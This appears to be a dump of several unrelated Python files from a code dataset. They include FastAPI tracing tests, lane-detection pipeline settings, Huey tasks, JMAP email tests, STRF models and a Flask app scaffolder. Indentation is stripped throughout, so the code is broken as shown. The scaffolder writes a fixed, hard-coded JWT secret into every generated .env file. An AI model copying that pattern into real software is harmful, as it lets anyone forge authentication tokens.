from thundra import constants
from thundra.context.execution_context_manager import ExecutionContextManager
from thundra.wrappers.fastapi.fastapi_wrapper import FastapiWrapper
from thundra.context.tracing_execution_context_provider import TracingExecutionContextProvider
from thundra.context.global_execution_context_provider import GlobalExecutionContextProvider
from thundra.wrappers import wrapper_utils
import pytest
def test_fastapi_hooks_called(test_app, monkeypatch):
def mock_before_request(self, request, req_body):
ExecutionContextManager.set_provider(TracingExecutionContextProvider())
execution_context = wrapper_utils.create_execution_context()
execution_context.platform_data["request"] = request
execution_context.platform_data["request"]["body"] = req_body
self.plugin_context.request_count += 1
self.execute_hook("before:invocation", execution_context)
assert execution_context.root_span.operation_name == '/1'
assert execution_context.root_span.get_tag('http.method') == 'GET'
assert execution_context.root_span.get_tag('http.host') == 'testserver'
assert execution_context.root_span.get_tag('http.query_params') == b''
assert execution_context.root_span.get_tag('http.path') == '/1'
assert execution_context.root_span.class_name == constants.ClassNames['FASTAPI']
assert execution_context.root_span.domain_name == 'API'
return execution_context
def mock_after_request(self, execution_context):
assert execution_context.response.body == b'{"hello_world":1}'
assert execution_context.response.status_code == 200
self.prepare_and_send_reports_async(execution_context)
ExecutionContextManager.clear()
monkeypatch.setattr(FastapiWrapper, "before_request", mock_before_request)
monkeypatch.setattr(FastapiWrapper, "after_request", mock_after_request)
response = test_app.get('/1')
def test_fastapi_errornous(test_app, monkeypatch):
try:
def mock_error_handler(self, error):
execution_context = ExecutionContextManager.get()
if error:
execution_context.error = error
self.prepare_and_send_reports_async(execution_context)
assert error.type == "RuntimeError"
assert error.message == "Test Error"
monkeypatch.setattr(FastapiWrapper, "error_handler", mock_error_handler)
test_app.get('/error')
except:
"Error thrown in endpoint"
|
nilq/baby-python
|
python
|
import lanelines
from compgraph import CompGraph, CompGraphRunner
import numpy as np
import cv2
func_dict = {
'warp': lanelines.warp,
'gray': lanelines.gray,
'get_HLS': lanelines.get_hls_channels,
'weighted_HLS_sum': lanelines.weighted_HLS,
'threshold_gray': lanelines.mask_threashold_range,
'threshold_S': lanelines.mask_threashold_range,
'threshold_wHLS': lanelines.mask_threashold_range,
'apply_sobel_x_to_S': lanelines.scaled_sobel_x,
'threshold_S_sobel_x': lanelines.mask_threashold_range,
'median_blur_tssx': cv2.medianBlur,
'close_thresholded_S': lanelines.morphological_close,
'gather_thresholded_images': lanelines.gather_thresholded_images,
'combine_thresholds_bitwise_or': lanelines.bitwise_or,
'get_target_cells_coordinates': lanelines.get_target_cells_coordinates,
'fit_lane_polynomials': lanelines.fit_lane_polynomials,
}
func_io = {
'warp': (('image', 'M', 'canvas_size'), 'warped'),
'gray': ('warped', 'warped_gray'),
'get_HLS': ('warped', ('H', 'L', 'S')),
'weighted_HLS_sum': (('H', 'L', 'S', 'HLS_weights'), 'weighted_HLS'),
'threshold_gray': (('warped_gray', 'gray_from', 'gray_to'), 'thresholded_gray'),
'threshold_S': (('S', 'S_from', 'S_to'), 'thresholded_S'),
'threshold_wHLS': (('weighted_HLS', 'wHLS_from', 'wHLS_to'), 'thresholded_wHLS'),
'apply_sobel_x_to_S': ('S', 'S_sobel_x'),
'threshold_S_sobel_x': (('S_sobel_x', 'S_sobel_x_from', 'S_sobel_x_to'), 'thresholded_S_sobel_x'),
'median_blur_tssx': (('thresholded_S_sobel_x', 'tssx_median_kernel'), 'tssx_median'),
'close_thresholded_S': (('thresholded_S', 'close_kernel_for_tS'), 'ts_closed'),
'gather_thresholded_images' : (
('thresholded_S', 'thresholded_wHLS', 'thresholded_S_sobel_x', 'tssx_median', 'ts_closed', 'thresholded_gray'),
'thresholded_images'
),
'combine_thresholds_bitwise_or': ('thresholded_images', 'all_thresholds'),
'get_target_cells_coordinates': (
('all_thresholds', 'n_cells_x', 'n_cells_y', 'cell_threshold'),
('estpoints_left', 'estpoints_right'),
),
'fit_lane_polynomials': (
('estpoints_left', 'estpoints_right'),
('p_coefs_left', 'p_coefs_right')
),
}
computational_graph = CompGraph(func_dict, func_io)
parameters = {
'canvas_size': (500, 1500),
'HLS_weights': [0, 0.4, 1.],
'gray_from': 210,
'gray_to': 255,
'S_from': 180,
'S_to': 255,
'wHLS_from': 180,
'wHLS_to': 255,
'S_sobel_x_from': 20,
'S_sobel_x_to': 240,
'tssx_median_kernel': 5,
'close_kernel_for_tS': (3, 3),
'n_cells_x': 50,
'n_cells_y': 100,
'cell_threshold': 70,
}
|
nilq/baby-python
|
python
|
import time
import typing as t
from huey import crontab
from app.db.session import db_session
from app.db.crud.server import get_server_with_ports_usage
from app.db.crud.port_forward import get_forward_rule, get_all_expire_rules
from app.db.models.port import Port
from .config import huey
from tasks.ansible import ansible_hosts_runner
from tasks.utils.runner import run
from tasks.utils.handlers import iptables_finished_handler
def clean_finished_handler(runner):
ansible_hosts_runner()
@huey.task()
def clean_runner(server: t.Dict):
run(
server=server,
playbook="clean.yml",
finished_callback=clean_finished_handler,
)
@huey.task(priority=4)
def clean_port_runner(server_id: int, port: Port, update_traffic: bool = True):
with db_session() as db:
if db_forward_rule := get_forward_rule(db, server_id, port.id):
db.delete(db_forward_rule)
db.commit()
server = get_server_with_ports_usage(db, server_id)
run(
server=server,
playbook="clean_port.yml",
extravars={"local_port": port.num},
finished_callback=iptables_finished_handler(
server.id, accumulate=True, update_traffic_bool=update_traffic
),
)
@huey.periodic_task(crontab(minute="*"), priority=4)
def clean_expired_port_runner():
with db_session() as db:
db_expire_rules = get_all_expire_rules(db)
for db_rule in db_expire_rules:
if time.time() > db_rule.config.get("expire_time", float("inf")):
clean_port_runner(
db_rule.port.server.id,
db_rule.port,
update_traffic=True,
)
|
nilq/baby-python
|
python
|
# This is an exact clone of identification.py with functions renamed for clarity and all code relating to creating an
# alignment removed
from typing import Tuple
import sys
import os
path_to_src = (os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
sys.path.append(path_to_src)
from src.objects import Database, Spectrum, MPSpectrumID, DEVFallOffEntry
from src.preprocessing import merge_search, preprocessing_utils
from src import database
from src.file_io import JSON
import time
import os
import copy
import json
# top results to keep for creating an alignment
TOP_X = 50
def database_and_spectra_preprocessing(
spectra_files: str,
database_file: str,
verbose: bool = True,
min_peptide_len: int = 5,
max_peptide_len: int = 20,
peak_filter: int = 0,
relative_abundance_filter: float = 0.0,
ppm_tolerance: int = 20,
precursor_tolerance: int = 10,
digest: str = '',
cores: int = 1,
n: int = 5,
DEBUG: bool = False,
truth_set: str = '',
output_dir: str = ''
) -> dict:
# build/load the database
verbose and print('Loading database...')
db = database.build(database_file)
verbose and print('Done')
# load all of the spectra
verbose and print('Loading spectra...')
spectra, boundaries = preprocessing_utils.load_spectra(
spectra_files,
ppm_tolerance,
peak_filter=peak_filter,
relative_abundance_filter=relative_abundance_filter
)
verbose and print('Done')
# get the boundary -> kmer mappings for b and y ions
matched_masses_b, matched_masses_y, db = merge_search.modified_match_masses(boundaries, db, max_peptide_len, DEBUG)
# # if we only get 1 core, don't do the multiprocessing bit
# if cores == 1:
# # go through and id all spectra
# for i, spectrum in enumerate(spectra):
# print(f'Creating alignment for spectrum {i+1}/{len(spectra)} [{to_percent(i+1, len(spectra))}%]', end='\r')
# # get b and y hits
# b_hits, y_hits = [], []
# for mz in spectrum.spectrum:
# # get the correct boundary
# mapped = mz_mapping[mz]
# b = boundaries[mapped]
# b = hashable_boundaries(b)
# if b in matched_masses_b:
# b_hits += matched_masses_b[b]
# if b in matched_masses_y:
# y_hits += matched_masses_y[b]
return db
|
nilq/baby-python
|
python
|
from .base import NextcloudManager
class NextcloudGroupManager(NextcloudManager):
def all(self, search=None):
"""
Get all nextcloud groups
"""
request = self.api.get_groups(search=search)
self.check_request(request)
objs = []
for name in request.data['groups']:
objs.append(self.get(name))
return objs
def get(self, name=None, **kwargs):
"""
Get a specific nextcloud group
"""
return super().get(name=name, **kwargs)
|
nilq/baby-python
|
python
|
import numpy as np
import matplotlib.pyplot as plt
from soundsig.plots import multi_plot
"""
Implementation of S. Zayd Enam's STRF modeling stuff:
S. Zayd Enam, Michael R. DeWeese, "Spectro-Temporal Models of Inferior Colliculus Neuron Receptive Fields"
http://users.soe.ucsc.edu/~afletcher/hdnips2013/papers/strfmodels_plos.pdf
"""
def onset_strf(t, f, t_c=0.150, t_freq=10.0, t_phase=0.0, t_sigma=0.250, f_c=3000.0, f_sigma=500.0):
T,F = np.meshgrid(t, f)
f_part = np.exp(-(F - f_c)**2 / (2*f_sigma**2))
t_part = np.sin(2*np.pi*t_freq*(T - t_c) + t_phase)
exp_part = np.exp( (-(T - t_c)**2 / (2*t_sigma**2)) )
strf = t_part*f_part*exp_part
strf /= np.abs(strf).max()
return strf
def checkerboard_strf(t, f, t_freq=10.0, t_phase=0.0,
f_freq=1e-6, f_phase=0.0, t_c=0.150, f_c=3000.0,
t_sigma=0.050, f_sigma=500.0, harmonic=False):
T,F = np.meshgrid(t, f)
t_part = np.cos(2*np.pi*t_freq*T + t_phase)
f_part = np.cos(2*np.pi*f_freq*F + f_phase)
exp_part = np.exp( (-(T-t_c)**2 / (2*t_sigma**2)) - ((F - f_c)**2 / (2*f_sigma**2)) )
if harmonic:
f_part = np.abs(f_part)
strf = t_part*f_part*exp_part
strf /= np.abs(strf).max()
return strf
def sweep_strf(t, f, theta=0.0, aspect_ratio=1.0, phase=0.0, wavelength=0.5, spread=1.0, f_c=5000.0, t_c=0.0):
T,F = np.meshgrid(t-t_c, f-f_c)
T /= np.abs(T).max()
F /= np.abs(F).max()
Tp = T*np.cos(theta) + F*np.sin(theta)
Fp = -T*np.sin(theta) + F*np.cos(theta)
exp_part = np.exp( -(Tp**2 + (aspect_ratio**2 * Fp**2)) / (2*spread**2) )
cos_part = np.cos( (2*np.pi*Tp / wavelength) + phase)
return exp_part*cos_part
def plot_strf(pdata, ax):
strf = pdata['strf']
absmax = np.abs(strf).max()
plt.imshow(strf, interpolation='nearest', aspect='auto', origin='lower',
extent=plot_extent, vmin=-absmax, vmax=absmax, cmap=plt.cm.seismic)
plt.title(pdata['title'])
plt.xticks([])
plt.yticks([])
if __name__ == '__main__':
nt = 100
t = np.linspace(0.0, 0.250)
nf = 100
f = np.linspace(300.0, 8000.0, nf)
plot_extent = [t.min(), t.max(), f.min(), f.max()]
#build onset STRFs of varying center frequency and temporal bandwidths
onset_f_sigma = 500
onset_f_c = np.linspace(300.0, 8000.0, 10)
onset_t_sigmas = np.array([0.005, 0.010, 0.025, 0.050])
onset_t_freqs = np.array([20.0, 15.0, 10.0, 5.0])
onset_plist = list()
for f_c in onset_f_c:
for t_sigma,t_freq in zip(onset_t_sigmas, onset_t_freqs):
t_c = 0.5*(1.0 / t_freq) - 0.010
strf = onset_strf(t, f, t_freq=t_freq, t_phase=np.pi, f_c=f_c, f_sigma=1000.0, t_sigma=t_sigma, t_c=t_c)
title = '$f_c$=%dHz, $\sigma_t$=%dms, $f_t$=%dHz' % (f_c, t_sigma*1e3, t_freq)
onset_plist.append({'strf':strf, 'title':title})
multi_plot(onset_plist, plot_strf, nrows=len(onset_f_c), ncols=len(onset_t_sigmas))
#build harmonic stack STRFs
stack_t_sigma = 0.005
stack_f_sigma = 1500
stack_f_c = np.linspace(300.0, 8000.0, 10)
stack_f_freq = np.linspace(1e-4, 7e-4, 5)
stack_t_freqs = np.array([20.0, 15.0, 10.0, 5.0])
stack_plist = list()
for f_c in stack_f_c:
for f_freq in stack_f_freq:
strf = checkerboard_strf(t, f,
t_freq=10.0, t_phase=0.0,
f_freq=f_freq, f_phase=0.0,
t_c=0.015, f_c=f_c,
t_sigma=stack_t_sigma, f_sigma=stack_f_sigma, harmonic=False)
title = '$f_c$=%dHz, f_freq=%0.6f' % (f_c, f_freq)
stack_plist.append({'strf':strf, 'title':title})
multi_plot(stack_plist, plot_strf, nrows=len(stack_f_c), ncols=len(stack_f_freq))
#build frequency sweep STRFs
sweep_wavelengths = np.array([0.25, 0.5, 0.75])
sweep_spreads = np.array([0.100, 0.150, 0.200, 0.250])
sweep_thetas = np.array([-np.pi/8, -np.pi/6, -np.pi/4, np.pi/4, np.pi/6, np.pi/8])
sweep_plist = list()
for wavelength,spread in zip(sweep_wavelengths, sweep_spreads):
for theta in sweep_thetas:
t_c = 0.1*wavelength
strf = sweep_strf(t, f, theta=theta, wavelength=wavelength, spread=spread, t_c=t_c)
title = '$\lambda$=%0.3f, $\\theta$=%d$\degree$' % (wavelength, theta*(180.0 / np.pi))
sweep_plist.append({'strf':strf, 'title':title})
multi_plot(sweep_plist, plot_strf, nrows=len(sweep_wavelengths), ncols=len(sweep_thetas))
plt.show()
|
nilq/baby-python
|
python
|
import binascii
import pytest
from random import random
import jmap
from jmap import errors
@pytest.mark.asyncio
async def test_mailbox_get_all(account, idmap):
response = await account.mailbox_get(idmap)
assert response['accountId'] == account.id
assert int(response['state']) > 0
assert isinstance(response['notFound'], list)
assert len(response['notFound']) == 0
assert isinstance(response['list'], list)
assert len(response['list']) > 0
for mailbox in response['list']:
assert mailbox['id']
assert mailbox['name']
assert mailbox['myRights']
assert 'role' in mailbox
assert 'sortOrder' in mailbox
assert 'totalEmails' in mailbox
assert 'totalThreads' in mailbox
assert 'unreadThreads' in mailbox
assert 'isSubscribed' in mailbox
assert 'parentId' in mailbox
@pytest.mark.asyncio
async def test_mailbox_get_notFound(account, idmap):
wrong_ids = ['notexisting', 123]
properties = ['name', 'myRights']
response = await account.mailbox_get(
idmap,
ids=wrong_ids,
properties=properties,
)
assert response['accountId'] == account.id
assert int(response['state']) > 0
assert isinstance(response['notFound'], list)
assert set(response['notFound']) == set(wrong_ids)
assert isinstance(response['list'], list)
assert len(response['list']) == 0
@pytest.mark.asyncio
async def test_mailbox_set_fail(account, idmap):
with pytest.raises(errors.stateMismatch):
await account.mailbox_set(idmap, ifInState='wrongstate')
@pytest.mark.asyncio
async def test_mailbox_create_duplicate(account, idmap):
response = await account.mailbox_set(
idmap,
create={
"test": {
"parentId": None,
"name": 'INBOX',
}
}
)
assert response['notCreated']['test']['type'] == 'invalidArguments'
@pytest.mark.asyncio
async def test_mailbox_create_rename_destroy(account, idmap, inbox_id):
# Create
response = await account.mailbox_set(
idmap,
create={
"test": {
"parentId": inbox_id,
"name": str(random())[2:10],
"isSubscribed": False,
}
}
)
newId = response['created']['test']['id']
assert not response['notCreated']
assert not response['updated']
assert not response['notUpdated']
assert not response['destroyed']
assert not response['notDestroyed']
# Rename
update = {newId: {"name": " ÁÝŽ-\\"}}
response = await account.mailbox_set(idmap, update=update)
assert not response['created']
assert not response['notCreated']
assert response['updated'] == update
assert not response['notUpdated']
assert not response['notUpdated']
assert not response['destroyed']
# Destroy
response = await account.mailbox_set(idmap, destroy=[newId])
assert not response['created']
assert not response['notCreated']
assert not response['updated']
assert not response['notUpdated']
assert response['destroyed'] == [newId]
assert not response['notDestroyed']
@pytest.mark.asyncio
async def test_mailbox_query(account, inbox_id):
response = await account.mailbox_query(
filter={"parentId": inbox_id},
sort=[{"property": "sortOrder"},{"property": "name"}],
position=0,
limit=10,
calculateTotal=True,
)
assert response['accountId'] == account.id
assert isinstance(response['ids'], list)
assert 0 < len(response['ids']) <= 10
@pytest.mark.asyncio
async def test_email_query_inMailbox(account, inbox_id, email_id):
response = await account.email_query(**{
"filter": {"inMailbox": inbox_id},
"anchor": email_id,
"collapseThreads": False,
"limit": 10,
"calculateTotal": True
})
assert response['accountId'] == account.id
assert response['position'] > 0
assert response['total'] > 0
assert response['collapseThreads'] == False
assert response['queryState']
assert isinstance(response['ids'], list)
assert 0 < len(response['ids']) <= 10
assert response['canCalculateChanges'] in (True, False)
@pytest.mark.asyncio
async def test_email_get_all(account, idmap, uidvalidity):
response = await account.email_get(idmap)
assert response['accountId'] == account.id
assert isinstance(response['list'], list)
assert 0 < len(response['list']) <= 1000
assert response['notFound'] == []
for msg in response['list']:
assert msg['id']
assert msg['threadId']
@pytest.mark.asyncio
async def test_email_get(account, idmap, uidvalidity, email_id, email_id2):
properties = {
'threadId', 'mailboxIds', 'inReplyTo', 'keywords', 'subject',
'sentAt', 'receivedAt', 'size', 'blobId',
'from', 'to', 'cc', 'bcc', 'replyTo',
'attachments', 'hasAttachment',
'headers', 'preview', 'body',
}
good_ids = [email_id, email_id2]
wrong_ids = [
"notsplit",
"not-int",
f"{uidvalidity}-{1 << 33}",
f"{uidvalidity}-{1 << 32}",
f"{uidvalidity}-{(1<<32)-1}",
f"{uidvalidity}-0",
f"{uidvalidity}--10",
f"{uidvalidity}-1e2",
f"{uidvalidity}-str",
1234,
]
response = await account.email_get(
idmap,
ids=good_ids + wrong_ids,
properties=list(properties),
maxBodyValueBytes=1024,
)
assert response['accountId'] == account.id
assert isinstance(response['list'], list)
assert len(response['list']) == 2
assert isinstance(response['notFound'], list)
assert set(response['notFound']) == set(wrong_ids)
for msg in response['list']:
assert msg['id'] in good_ids
for prop in properties - {'body'}:
assert prop in msg
assert 'textBody' in msg or 'htmlBody' in msg
@pytest.mark.asyncio
async def test_email_query_get_threads(account, idmap, inbox_id):
response = await account.email_query(**{
"filter": {"inMailbox": inbox_id},
"sort": [{"property": "receivedAt", "isAscending": False}],
"collapseThreads": True,
"position": 0,
"limit": 30,
"calculateTotal": True,
})
response = await account.email_get(idmap, ids=response['ids'], properties=["threadId"])
assert isinstance(response['notFound'], list)
assert len(response['notFound']) == 0
assert isinstance(response['list'], list)
assert len(response['list']) == 30
for msg in response['list']:
assert msg['id']
assert msg['threadId']
thread_ids = [msg['threadId'] for msg in response['list']]
response = await account.thread_get(idmap, ids=thread_ids)
assert len(response['notFound']) == 0
assert len(response['list']) >= 30
email_ids = []
for thread in response['list']:
assert thread['id']
assert thread['emailIds']
email_ids.extend(thread['emailIds'])
properties = ["threadId","mailboxIds","keywords",
"hasAttachment","from","to","subject",
"receivedAt","size","preview"]
response = await account.email_get(idmap, ids=email_ids, properties=properties)
assert len(response['notFound']) == 0
assert len(response['list']) >= 30
for msg in response['list']:
for prop in properties:
assert prop in msg
@pytest.mark.asyncio
async def test_email_get_detail(account, idmap, email_id):
properties = {
"blobId", "messageId", "inReplyTo", "references",
"header:list-id:asText", "header:list-post:asURLs",
"sender", "cc", "bcc", "replyTo", "sentAt",
"bodyStructure", "bodyValues",
}
bodyProperties = [
"partId", "blobId", "size", "name", "type",
"charset", "disposition", "cid", "location",
]
response = await account.email_get(idmap, **{
"ids": [email_id],
"properties": list(properties),
"fetchHTMLBodyValues": True,
"bodyProperties": bodyProperties,
})
assert response['accountId'] == account.id
assert isinstance(response['notFound'], list)
assert len(response['notFound']) == 0
assert isinstance(response['list'], list)
assert len(response['list']) == 1
for msg in response['list']:
for prop in properties - {'body'}:
assert prop in msg
@pytest.mark.asyncio
async def test_email_setget_seen(account, idmap, email_id):
for state in (True, False):
response = await account.email_set(
idmap,
update={
email_id: {"keywords/$seen": state}
}
)
assert response['accountId'] == account.id
assert isinstance(response['updated'], dict)
assert isinstance(response['notUpdated'], dict)
assert isinstance(response['created'], dict)
assert isinstance(response['notCreated'], dict)
assert isinstance(response['destroyed'], list)
assert isinstance(response['notDestroyed'], dict)
assert len(response['updated']) > 0
assert len(response['notUpdated']) == 0
assert len(response['created']) == 0
assert len(response['notCreated']) == 0
assert len(response['destroyed']) == 0
assert len(response['notDestroyed']) == 0
response = await account.email_get(
idmap,
ids=[email_id],
properties=['keywords']
)
assert response['list'][0]['id'] == email_id
assert response['list'][0]['keywords'].get('$seen', False) == state
@pytest.mark.asyncio
async def test_email_create_destroy(account, idmap, inbox_id):
async def create_stream():
yield binascii.a2b_base64("iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVQYV2NgYAAAAAMAAWgmWQ0AAAAASUVORK5CYII=")
res = await account.upload(create_stream(), 'image/png')
attachmentBlobId = res['blobId']
email = {
"mailboxIds": [inbox_id],
"to": [{
"name": "Filip Hanes",
"email": "filip.hanes@example.com"
}],
"bodyValues": {
"1": {
"type": "text/plain",
"value": "Hi,\nwhats'up wonderful person?",
},
"2": {
"type": "text/html",
"value": "<p>Hi,</p><p>whats'up wonderful person?</p>",
},
},
"textBody": [{
'partId': "1",
'type': "text/plain",
}],
"htmlBody": [{
'partId': "2",
'type': "text/html",
}],
"attachments": [
{
'blobId': attachmentBlobId,
'type': "image/png",
'name': "picture.png",
'cid': "picture.png",
'disposition': 'attachment',
},
]
}
response = await account.email_set(idmap, create={"test": email})
assert response['created']['test']['id']
blobId = response['created']['test']['blobId']
assert blobId
body = await account.download(blobId)
assert body
@pytest.mark.asyncio
async def test_email_changes(account, uidvalidity):
response = await account.email_changes(sinceState=f"{uidvalidity},1,1", maxChanges=3000)
changes = response['created'] + response['updated'] + response['removed']
assert 0 < len(changes) < 3000
@pytest.mark.asyncio
async def test_thread_changes(account, uidvalidity):
response = await account.thread_changes(sinceState=f"{uidvalidity},1,10", maxChanges=30)
changes = response['created'] + response['updated'] + response['removed']
assert 0 < len(changes) < 30
@pytest.mark.asyncio
async def test_mailbox_changes(account):
with pytest.raises(jmap.errors.cannotCalculateChanges):
await account.mailbox_changes(sinceState="1", maxChanges=300)
|
nilq/baby-python
|
python
|
from ocha.libs import utils
import os, yaml
from ocha.libs import setting
def create_production_env(data_env, app_path):
host = data_env['app']['host']
port = data_env['app']['port']
f=open(app_path+"/production.sh", "a+")
f.write("gunicorn production:app -b "+str(host)+":"+str(port)+" -w 2 --chdir "+app_path+"/")
f.close()
def create_env(data_env, app_path):
db_driver = None
try:
db_driver = data_env['database']['driver']
except Exception:
db_driver = "cockroachdb"
env_check = None
try:
env_check = data_env['app']['environment']
except Exception as e:
print(e)
env_sett = ""
if env_check:
if env_check == 'production':
env_sett = "False"
else:
env_sett = "True"
f=open(app_path+"/.env", "a+")
# APP CONFIG
f.write("APP_NAME = "+data_env['app']['name'])
f.write("\n")
f.write("APP_HOST = "+data_env['app']['host'])
f.write("\n")
f.write("APP_PORT = "+str(data_env['app']['port']))
f.write("\n")
f.write("FLASK_DEBUG = "+env_sett)
f.write("\n")
f.write("\n")
# MEMCACHE CONFIG
f.write("MEMCACHE_HOST = "+data_env['app']['host'])
f.write("\n")
f.write("MEMCACHE_PORT = 11211")
f.write("\n")
f.write("\n")
# DATABASE CONFIG
f.write("DB_NAME = "+data_env['database']['name'])
f.write("\n")
f.write("DB_HOST = "+data_env['database']['host'])
f.write("\n")
f.write("DB_PORT = "+str(data_env['database']['port']))
f.write("\n")
f.write("DB_USER = "+data_env['database']['username'])
f.write("\n")
f.write("DB_SSL = "+data_env['database']['ssl'])
f.write("\n")
f.write("DB_DRIVER = "+db_driver)
f.write("\n")
f.write("\n")
# REDIS CONFIG
f.write("FLASK_REDIS_URL = redis://:"+data_env['redis']['password']+"@"+str(data_env['redis']['host'])+":"+str(data_env['redis']['port'])+"/0")
f.write("\n")
f.write("\n")
f.write("JWT_SECRET_KEY = wqertyudfgfhjhkcxvbnmn@123$32213")
f.close()
def create_file_controller(nm_controller, app_path, security):
controller_path = app_path+"/app/controllers/api"
file_controller_path = controller_path+"/"+nm_controller+".py"
create_controller(nm_controller,file_controller_path, security)
def create_controller(nm_controller, file_controller_path, security):
sec_value = ""
if security == True:
sec_value = "@jwt_required"
nm_ctrl = nm_controller.capitalize()
f=open(file_controller_path, "a+")
value_ctrl = """from flask_restful import Resource, reqparse, request
from app.helpers.rest import response
from app.helpers import cmd_parser as cmd
from app import psycopg2
from app.libs import utils
from app.models import model as db
from app.middlewares.auth import jwt_required
from app.helpers import endpoint_parse as ep
import json
class """+nm_ctrl+"""(Resource):
"""+sec_value+"""
def post(self):
json_req = request.get_json(force=True)
command = utils.get_command(request.path)
command = command
init_data = cmd.parser(json_req, command)
a = ep.endpoint_parser(command, init_data)
return response(200, data=a)
"""
f.write(value_ctrl)
f.close()
def read_app(app_name, path=None):
if path is None:
app_path = utils.APP_HOME+"/BLESS/"+app_name
else:
app_path = path+"/"+app_name
if not os.path.exists(app_path):
return None
else:
return app_path
def set_endpoint_template(endpoint_obj, app_path):
endpoint_fix = {
"endpoint": endpoint_obj
}
endpoint_value = yaml.dump(endpoint_fix)
template_path = app_path+"/app/static/templates/endpoint.yml"
f=open(template_path, "a+")
f.write(endpoint_value)
f.close()
def create_app(app_name, app_framework, path=None):
url_git = "https://github.com/Blesproject/bless_"+app_framework+".git"
if path is None:
app_path = utils.APP_HOME+"/BLESS"
dst_path = app_path+"/"+app_name
else:
app_path = path
dst_path = app_path+"/"+app_name
if not os.path.exists(app_path):
os.makedirs(app_path)
# copy(flask_path,dst_path)
try:
clone = utils.template_git(url=url_git, dir=dst_path)
except Exception as e:
print(str(e))
else:
return True
else:
# copy(flask_path,dst_path)
try:
clone = utils.template_git(url=url_git, dir=dst_path)
except Exception as e:
print(str(e))
else:
return False
def create_routing(endpoint_obj, app_path):
init_import = "from flask import Blueprint\nfrom flask_restful import Api \nfrom .user import *\nfrom .auth import *\n"
ctrl_import = ""
for i in endpoint_obj:
ctrl_import += "from ."+i+" import * \n"
p_import = init_import+ctrl_import
value_start = """\n\napi_blueprint = Blueprint("api", __name__, url_prefix='/api')
api = Api(api_blueprint)
api.add_resource(UserdataResource, '/user')
api.add_resource(UserdataResourceById, '/user/<userdata_id>')
api.add_resource(UserdataInsert, '/user')
api.add_resource(UserdataUpdate, '/user/<userdata_id>')
api.add_resource(UserdataRemove, '/user/<userdata_id>')
api.add_resource(Usersignin, '/sign')
api.add_resource(UserTokenRefresh, '/sign/token')
api.add_resource(UserloginInsert, '/user/add')\n"""
value_default = p_import+value_start
add_resource_data = ""
for a in endpoint_obj:
ctrl_class = a.capitalize()
add_resource_data += "api.add_resource("+ctrl_class+", '/"+a+"')\n"
all_value = value_default+ add_resource_data
init_path = app_path+"/app/controllers/api/__init__.py"
f=open(init_path, "a+")
f.write(all_value)
f.close()
def create_moduls(moduls_name, moduls_data, app_path, sync_md=None):
import_value = "from app.models import model as db\n\n\n"
moduls_path = ""
file_moduls_path = ""
if sync_md is None:
moduls_path = app_path+"/app/moduls/"
file_moduls_path = moduls_path+moduls_name+".py"
else:
moduls_path = app_path+"/moduls/"
file_moduls_path = moduls_path+moduls_name+".py"
f=open(file_moduls_path, "a+")
f.write(import_value)
function_value = ""
utils.report("Moduls "+moduls_name+" Create")
for i in moduls_data:
if moduls_data[i]['action'] == 'insert':
function_value += """def """+moduls_data[i]['action']+"""(args):
# your code here
table = args['table']
fields = args['fields']
try:
result = db.insert(table, fields)
except Exception as e:
respons = {
"status": False,
"error": str(e)
}
else:
respons = {
"status": True,
"messages": "Fine!",
"id": result
}
finally:
return respons\n\n
"""
elif moduls_data[i]['action'] == 'remove':
function_value += """def """+moduls_data[i]['action']+"""(args):
# your code here
table = args['table']
fields = ""
field_value = ""
for i in args['fields']:
fields = i
field_value = args['fields'][i]
try:
result = db.delete(table,fields,field_value)
except Exception as e:
respons = {
"status": False,
"messages": str(e)
}
else:
respons = {
"status": result,
"messages": "Fine Deleted!"
}
finally:
return respons\n\n
"""
elif moduls_data[i]['action'] == 'get':
function_value += """def """+moduls_data[i]['action']+"""(args):
# your code here
col = db.get_columns(args['table'])
dt_types = db.get_types(args['table'])
results = None
try:
results = db.get_all(args['table'])
except Exception as e:
return {
'error': str(e)
}
else:
respons = list()
for i in results:
index = 0
data = dict()
for a in i:
if a in col:
if dt_types[index] == 'INT':
data[a]=str(i[a])
else:
data[a]=str(i[a])
index += 1
respons.append(data)
return respons\n\n
"""
elif moduls_data[i]['action'] == 'where':
function_value += """def """+moduls_data[i]['action']+"""(args):
# your code here
col = db.get_columns(args['table'])
dt_types = db.get_types(args['table'])
results = None
fields = ""
field_value = ""
for i in args['fields']:
fields = i
field_value = args['fields'][i]
try:
results = db.get_by_id(args['table'],fields,field_value)
except Exception as e:
return {
'error': str(e)
}
else:
respons = list()
for i in results:
index = 0
data = dict()
for a in i:
if a in col:
if dt_types[index] == 'INT':
data[a]=str(i[a])
else:
data[a]=str(i[a])
index += 1
respons.append(data)
return respons\n\n
"""
else:
function_value += """def """+moduls_data[i]['action']+"""(args):
# your code here
return args\n\n
"""
f.write(function_value)
f.close()
def add_function_moduls(moduls_name, moduls_data, app_path, sync_md = None):
moduls_path = ""
file_moduls_path = ""
if sync_md is None:
moduls_path = app_path+"/app/moduls/"
file_moduls_path = moduls_path+moduls_name+".py"
else:
moduls_path = app_path+"/moduls/"
file_moduls_path = moduls_path+moduls_name+".py"
with open(file_moduls_path, "a") as myfile:
function_value = ""
for i in moduls_data:
# print(i)
if moduls_data[i]['action'] == 'insert':
function_value += """
def """+moduls_data[i]['action']+"""(args):
# your code here
table = args['table']
fields = args['fields']
try:
result = db.insert(table, fields)
except Exception as e:
respons = {
"status": False,
"error": str(e)
}
else:
respons = {
"status": True,
"messages": "Fine!",
"id": result
}
finally:
return respons\n\n
"""
elif moduls_data[i]['action'] == 'remove':
function_value += """
def """+moduls_data[i]['action']+"""(args):
# your code here
table = args['table']
fields = ""
field_value = ""
for i in args['fields']:
fields = i
field_value = args['fields'][i]
try:
result = db.delete(table,fields,field_value)
except Exception as e:
respons = {
"status": False,
"messages": str(e)
}
else:
respons = {
"status": result,
"messages": "Fine Deleted!"
}
finally:
return respons\n\n
"""
elif moduls_data[i]['action'] == 'get':
function_value += """
def """+moduls_data[i]['action']+"""(args):
# your code here
col = db.get_columns(args['table'])
dt_types = db.get_types(args['table'])
results = None
try:
results = db.get_all(args['table'])
except Exception as e:
return {
'error': str(e)
}
else:
respons = list()
for i in results:
index = 0
data = dict()
for a in i:
if a in col:
if dt_types[index] == 'INT':
data[a]=str(i[a])
else:
data[a]=str(i[a])
index += 1
respons.append(data)
return respons\n\n
"""
elif moduls_data[i]['action'] == 'where':
function_value += """
def """+moduls_data[i]['action']+"""(args):
col = db.get_columns(args['table'])
dt_types = db.get_types(args['table'])
